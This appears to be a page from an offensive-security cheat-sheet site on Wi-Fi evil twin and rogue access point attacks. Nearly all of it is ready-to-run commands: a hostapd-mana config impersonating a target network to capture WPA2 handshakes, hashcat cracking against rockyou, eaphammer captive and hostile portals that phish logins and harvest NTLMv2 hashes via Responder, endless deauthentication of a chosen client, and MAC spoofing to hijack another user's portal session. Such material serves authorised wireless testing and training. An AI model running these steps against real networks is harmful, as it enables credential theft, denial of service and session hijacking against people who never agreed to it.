> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Evil Twin / Rogue AP

> Rogue access point attacks: capturing WPA2 handshakes from offline networks, credential phishing via captive portals, and hostile portal attacks.

## Overview

Evil Twin attacks involve creating a rogue AP that impersonates a legitimate network. Clients probing for a known network can be lured to connect to the fake AP, exposing their handshake, credentials, or session tokens.

***

## Capture Handshake from Offline Network

If a network is not currently in range but clients are probing for it, `hostapd-mana` can impersonate the AP and capture the WPA2 handshake when a client connects.

`hostapd.conf`:

```
interface=wlan1
driver=nl80211
hw_mode=g
channel=1
ssid=<TARGET-SSID>
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
```

Launch the rogue AP:

```bash theme={"dark"}
hostapd-mana hostapd.conf
```

Stop with `CTRL+C` when `AP-STA-POSSIBLE-PSK-MISMATCH` appears, the handshake is captured.

***

## Crack Captured Handshake with Hashcat

Convert `.hccapx` to mode 22000 format:

```bash theme={"dark"}
hcxhash2cap --hccapx=hostapd.hccapx -c aux.pcap
hcxpcapngtool aux.pcap -o hash.22000
hashcat -a 0 -m 22000 hash.22000 ~/rockyou.txt --force
```

Legacy mode (if `22000` is unavailable):

```bash theme={"dark"}
hashcat -a 0 -m 2500 hostapd.hccapx ~/rockyou.txt --force
```

***

## Captive Portal Attack (eaphammer)

Clients probing for open networks can be directed to a rogue AP with a captive portal that steals credentials via a fake login page.

```bash theme={"dark"}
cd ~/tools/eaphammer
sudo killall dnsmasq
./eaphammer --essid <TARGET-OPEN-SSID> --interface wlan1 --captive-portal
```

Deauthenticate the target client in parallel to force reconnection:

```bash theme={"dark"}
iwconfig wlan0mon channel <CHANNEL>
aireplay-ng -0 0 wlan0mon -a <BSSID> -c <CLIENT-MAC>
```

***

## Hostile Portal Attack (eaphammer + Responder)

Captures NTLMv2 hashes from Windows clients by serving a hostile portal that triggers automatic authentication.

```bash theme={"dark"}
cd ~/tools/eaphammer
sudo killall dnsmasq
./eaphammer --essid <TARGET-SSID> --interface wlan1 --hostile-portal
```

Deauthenticate in parallel:

```bash theme={"dark"}
iwconfig wlan0mon channel <CHANNEL>
aireplay-ng -0 0 wlan0mon -a <BSSID> -c <CLIENT-MAC>
```

Extract and crack the NTLMv2 hash:

```bash theme={"dark"}
cat logs/Responder-Session.log | grep NTLMv2 | grep Hash | awk '{print $9}' > responder.5600
hashcat -a 0 -m 5600 responder.5600 ~/rockyou.txt --force
```

***

## MAC Spoofing to Bypass Captive Portal

If a captive portal requires authentication but a connected client already has an active session, spoofing their MAC bypasses the portal.

Identify a connected client MAC via `airodump-ng`, then:

```bash theme={"dark"}
systemctl stop network-manager
ip link set wlan1 down
macchanger -m <CLIENT-MAC> wlan1
ip link set wlan1 up
```

Reconnect with `wpa_supplicant` and request an IP:

```bash theme={"dark"}
wpa_supplicant -Dnl80211 -i wlan1 -c open.conf
sudo dhclient -v wlan1
```
